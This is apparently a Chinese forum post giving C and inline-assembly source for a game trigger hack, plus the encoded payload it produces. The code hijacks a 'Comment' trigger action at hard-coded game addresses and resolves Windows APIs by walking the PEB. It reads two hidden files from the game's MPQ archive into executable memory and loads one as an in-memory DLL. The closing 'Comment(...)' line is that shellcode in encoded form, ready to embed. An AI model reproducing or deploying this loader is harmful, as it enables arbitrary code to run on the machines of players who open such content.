19号中文化4.13版本 MemoryLoadlibrary

castelu

1. #include <stdio.h>
   
2. #include <windows.h>
   
3. #include "mmsystem.h"
   
4. 
   
5. #define PINT int *
   
6. #define FASTCALL __fastcall
   
7. #pragma pack(1)
   
8. 
   
9. typedef struct
   
10. {
    
11.     DWORD Unused0;
    
12.     DWORD Text;//1
    
13.     DWORD Code;//2
    
14.     DWORD Unused2;//
    
15.     DWORD Address;
    
16.     DWORD Value;
    
17.     USHORT Operator;
    
18. } *ActionParams;
    
19. 
    
20. typedef void *HANDLE;
    
21. 
    
22. const FARPROC (WINAPI**sc_GetProcAddress) ( HMODULE hModule, LPCSTR lpProcName ) = (const FARPROC(WINAPI**)(HMODULE,LPCSTR))0x4ED160;
    
23. char* (FASTCALL*GetResString)(USHORT index) = (char*(FASTCALL*)(USHORT))0x448880;
    
24. DWORD (WINAPI**sc_LoadLibrary)(LPCSTR) = (DWORD(WINAPI**)(LPCSTR))(0x4ED15C);
    
25. void (WINAPI**sc_FreeLibrary)(DWORD) = (void(WINAPI**)(DWORD))(0x4ED138);
    
26. BOOL (WINAPI**sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *) = (BOOL(WINAPI**)(DWORD, DWORD, DWORD, DWORD *))0x5D171358;
    
27. //void * (WINAPI**sc_VirtualAlloc)(void *, SIZE_T, DWORD, DWORD) = (void *(WINAPI**)(void *, SIZE_T, DWORD, DWORD))0x004ED127;
    
28. 
    
29. FILE *(*sc_fopen)(LPCSTR,LPCSTR)=(FILE *(*)(LPCSTR,LPCSTR))(0x77C0F010/*0x7C02AE09*/);
    
30. int(*sc_fwrite)(void*,DWORD,DWORD,FILE*)=(int(*)(void*,DWORD,DWORD,FILE*))(0x77C1173B/*0x7C02CF72*/);
    
31. int(*sc_fclose)(FILE*)=(int(*)(FILE*))(0x77C10AB1/*0x7C01441F*/);
    
32. void *(*sc_malloc)(DWORD)=(void *(*)(DWORD))(0x77BFC407);
    
33. void (*sc_free)(void *)=(void (*)(void *))(0x77BFC21B);
    
34. 
    
35. BOOL(WINAPI**sc_SFileOpenArchive)(char *archivename, DWORD dwPriority, DWORD dwFlags, HANDLE *handle)=(BOOL(WINAPI**)(char *archivename, DWORD dwPriority, DWORD dwFlags, HANDLE *handle))0x4ED2BC;
    
36. BOOL(WINAPI**sc_SFileOpenFile)(char *filename, HANDLE *handle) = (BOOL(WINAPI**)(char *filename, HANDLE *handle))0x4ED364;
    
37. BOOL(WINAPI**sc_SFileCloseFile)(HANDLE hFile) = (BOOL(WINAPI**)(HANDLE hFile))0x4ED360;
    
38. BOOL(WINAPI**sc_SFileCloseArchive)(HANDLE hArchive) = (BOOL(WINAPI**)(HANDLE hArchive))0x4ED2C0;
    
39. long(WINAPI**sc_SFileGetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh) = (long(WINAPI**)(HANDLE hFile, LPDWORD lpFileSizeHigh))0x4ED358;
    
40. BOOL(WINAPI**sc_SFileOpenFileEx)(HANDLE handle, char *filename, char mode, HANDLE *result) =(BOOL(WINAPI**)(HANDLE handle, char *filename, char mode, HANDLE *result))0x4ED368;
    
41. BOOL(WINAPI**sc_SFileReadFile)(HANDLE hFile, void *buffer, DWORD nNumberOfBytesToRead, DWORD*, DWORD) = (BOOL(WINAPI**)(HANDLE hFile, void *buffer, DWORD nNumberOfBytesToRead, DWORD*, DWORD))0x4ED354;
    
42. 
    
43. MMRESULT(WINAPI*sc_midiStreamOpen)(LPHMIDISTRM phms, LPUINT puDeviceID, DWORD cMidi, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen) = (MMRESULT(WINAPI*)(LPHMIDISTRM phms, LPUINT puDeviceID, DWORD cMidi, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen))0x76B29F78;
    
44. MMRESULT(WINAPI*sc_midiStreamClose)(HMIDISTRM hms)=(MMRESULT(WINAPI*)(HMIDISTRM hms))0x76B2A2AB;
    
45. MMRESULT(WINAPI*sc_midiOutPrepareHeader)(HMIDIOUT hmo, LPMIDIHDR pmh, UINT cbmh)=(MMRESULT(WINAPI*)(HMIDIOUT hmo, LPMIDIHDR pmh, UINT cbmh))0x76B28DC5;
    
46. MMRESULT(WINAPI*sc_midiStreamOut)(HMIDISTRM hms, LPMIDIHDR pmh, UINT cbmh)=(MMRESULT(WINAPI*)(HMIDISTRM hms, LPMIDIHDR pmh, UINT cbmh))0x76B2A4EE;
    
47. MMRESULT(WINAPI*sc_midiOutOpen)(LPHMIDIOUT phmo,UINT uDeviceID,DWORD_PTR dwCallback,DWORD_PTR dwInstance, DWORD fdwOpen)=(MMRESULT(WINAPI*)(LPHMIDIOUT phmo,UINT uDeviceID,DWORD_PTR dwCallback,DWORD_PTR dwInstance, DWORD fdwOpen))0x76B28B74;
    
48. MMRESULT(WINAPI*sc_midiOutGetID)(HMIDIOUT hmo, LPUINT puDeviceID)=(MMRESULT(WINAPI*)(HMIDIOUT hmo, LPUINT puDeviceID))0x76B29CBB;
    
49. 
    
50. BOOL FASTCALL Comment(ActionParams params)
    
51. {
    
52. 
    
53.     HMODULE (*MemLoadLibrary)(void *, DWORD, DWORD, DWORD, DWORD);
    
54.     HANDLE mpq,file1,file2;
    
55.     void *dll;
    
56.     DWORD siz1,siz2;
    
57.     DWORD MEM = 5064013;
    
58.     DWORD WB = 25207;
    
59. 
    
60.     if(!(*sc_SFileOpenArchive)((char*)0x509364, 0, 0, &mpq)) return false;
    
61.     if(!(*sc_SFileOpenFileEx)(mpq, (char*)&MEM, 0, &file1)) return false;
    
62.     if(!(*sc_SFileOpenFileEx)(mpq, (char*)&WB, 0, &file2)) return false;
    
63.     siz1=(*sc_SFileGetFileSize)(file1, 0);
    
64.     siz2=(*sc_SFileGetFileSize)(file2, 0);
    
65. 
    
66. void * (WINAPI*sc_VirtualAlloc)(DWORD, DWORD, DWORD, DWORD);
    
67. DWORD GetProcAddress1;
    
68. DWORD LoadLibraryA1;
    
69. DWORD IsBadReadPtr1;
    
70. 
    
71.     _asm{
    
72.         call $+5+13;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
    
73.         _EMIT 'V';//这里写入API函数的名字。
    
74.         _EMIT 'i'
    
75.         _EMIT 'r'
    
76.         _EMIT 't'
    
77.         _EMIT 'u'
    
78.         _EMIT 'a'
    
79.         _EMIT 'l'
    
80.         _EMIT 'A'
    
81.         _EMIT 'l'
    
82.         _EMIT 'l'
    
83.         _EMIT 'o'
    
84.         _EMIT 'c'
    
85.         _EMIT '\0';//空结束符是必不可少的。
    
86.         mov eax,fs:30h;
    
87.         mov eax,[eax+0Ch];
    
88.         mov esi,[eax+1Ch];
    
89.         lodsd;
    
90.         push [eax+8];
    
91.         call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
    
92.         mov sc_VirtualAlloc,eax;
    
93.         
    
94.         call $+5+15;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
    
95.         _EMIT 'G';//这里写入API函数的名字。
    
96.         _EMIT 'e'
    
97.         _EMIT 't'
    
98.         _EMIT 'P'
    
99.         _EMIT 'r'
    
100.         _EMIT 'o'
     
101.         _EMIT 'c'
     
102.         _EMIT 'A'
     
103.         _EMIT 'd'
     
104.         _EMIT 'd'
     
105.         _EMIT 'r'
     
106.         _EMIT 'e'
     
107.         _EMIT 's'
     
108.         _EMIT 's'
     
109.         _EMIT '\0';//空结束符是必不可少的。
     
110.         mov eax,fs:30h;
     
111.         mov eax,[eax+0Ch];
     
112.         mov esi,[eax+1Ch];
     
113.         lodsd;
     
114.         push [eax+8];
     
115.         call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
     
116.         mov GetProcAddress1,eax;
     
117.         
     
118.         call $+5+13;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
     
119.         _EMIT 'L';//这里写入API函数的名字。
     
120.         _EMIT 'o'
     
121.         _EMIT 'a'
     
122.         _EMIT 'd'
     
123.         _EMIT 'L'
     
124.         _EMIT 'i'
     
125.         _EMIT 'b'
     
126.         _EMIT 'r'
     
127.         _EMIT 'a'
     
128.         _EMIT 'r'
     
129.         _EMIT 'y'
     
130.         _EMIT 'A'
     
131.         _EMIT '\0';//空结束符是必不可少的。
     
132.         mov eax,fs:30h;
     
133.         mov eax,[eax+0Ch];
     
134.         mov esi,[eax+1Ch];
     
135.         lodsd;
     
136.         push [eax+8];
     
137.         call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
     
138.         mov LoadLibraryA1,eax;
     
139.         
     
140.         call $+5+13;//13是下面的_EMIT 指令的数量，也就是包括\0在内的字符串长度
     
141.         _EMIT 'I';//这里写入API函数的名字。
     
142.         _EMIT 's'
     
143.         _EMIT 'B'
     
144.         _EMIT 'a'
     
145.         _EMIT 'd'
     
146.         _EMIT 'R'
     
147.         _EMIT 'e'
     
148.         _EMIT 'a'
     
149.         _EMIT 'd'
     
150.         _EMIT 'P'
     
151.         _EMIT 't'
     
152.         _EMIT 'r'
     
153.         _EMIT '\0';//空结束符是必不可少的。
     
154.         mov eax,fs:30h;
     
155.         mov eax,[eax+0Ch];
     
156.         mov esi,[eax+1Ch];
     
157.         lodsd;
     
158.         push [eax+8];
     
159.         call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量，否则会编译出错。
     
160.         mov IsBadReadPtr1,eax;
     
161.     }
     
162.     (void*&)MemLoadLibrary = (HMODULE)sc_VirtualAlloc(NULL, siz1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
     
163.     dll = sc_VirtualAlloc(NULL, siz2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
     
164.     (*sc_SFileReadFile)(file1, (void*&)MemLoadLibrary, siz1, &siz1, 0);
     
165.     (*sc_SFileReadFile)(file2, dll, siz2, &siz2, 0);
     
166.     (*sc_SFileCloseFile)(file1);
     
167.     (*sc_SFileCloseFile)(file2);
     
168.     (*sc_SFileCloseArchive)(mpq);
     
169.     MemLoadLibrary(dll,(DWORD)sc_VirtualAlloc,GetProcAddress1,LoadLibraryA1,IsBadReadPtr1);
     
170.     return true;
     
171. }
     
172. 
     
173. 
     
174. 
     
175. void AfterFunction(){}
     
176. LPCSTR Base64Enc(int size = 0)
     
177. {
     
178.     if (size <= 0)
     
179.         size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);
     
180.     PBYTE text = (PBYTE)Comment;
     
181.     PBYTE out = new BYTE[(size - 1) * 4 / 3 + 1],buf = out;
     
182.     int buflen = 0;
     
183. 
     
184.     while(size>0)
     
185.     {
     
186.         *buf++ = ((text[0] >> 2 ) & 0x3f) + 0x30;
     
187.         *buf++ = (((text[0] & 3) << 4) | (text[1] >> 4)) + 0x30;
     
188.         *buf++ = (((text[1] & 0xF) << 2) | (text[2] >> 6)) + 0x30;
     
189.         *buf++ = (text[2] & 0x3F) + 0x30;
     
190. 
     
191.         text +=3;
     
192.         size -=3;
     
193.         buflen +=4;
     
194.     }
     
195. 
     
196.     *buf = 0;
     
197.     return (LPCSTR)out;
     
198. }
     
199. 
     
200. 
     
201. int main(int argc, CHAR* argv[])
     
202. {
     
203.      malloc(1);   
     
204.     FILE *f1=fopen("d:\\desktop\\comment.txt","wb");
     
205.     fprintf(f1,"Comment(\"%s\", 0, 0, 17, 0, 1);\n",Base64Enc());
     
206.     fclose(f1);
     
207.     int i;
     
208. }

复制代码

castelu

Comment("EH_\Pn`LEhe5l50coeMGJ6BCD037ANQ=ADd0adGTMf800?lE_=9>08G0M@Lc`>WG0000SDGhD5N=ANQ@ogG`oaEXddh0QL1dhhe5m51GSDGTD?mel?lEJ==>08G0M<eFEomen?lEF==>05OoMOB9AOco5ESCCP2;EOaZ@8U5k8\=;=5>06P040000l9@EooAEh_`SDGlD?meo5KoMOSo5ECCCP1GSDG\D?mek8]5o0?6D?mem?lEE==>0?men?lEH==>0?mem?lEH==>0?mel?lE`=9>0?le[=5>08]5o?leG=5>00?6ocEPdDh0ocD\dDh0D?oFPl@DJ020001GE_lE5=5>03?0@5iObL?3", 0, 0, 19, 0, 1);
Comment("", 0, 0, 0, 0, 19);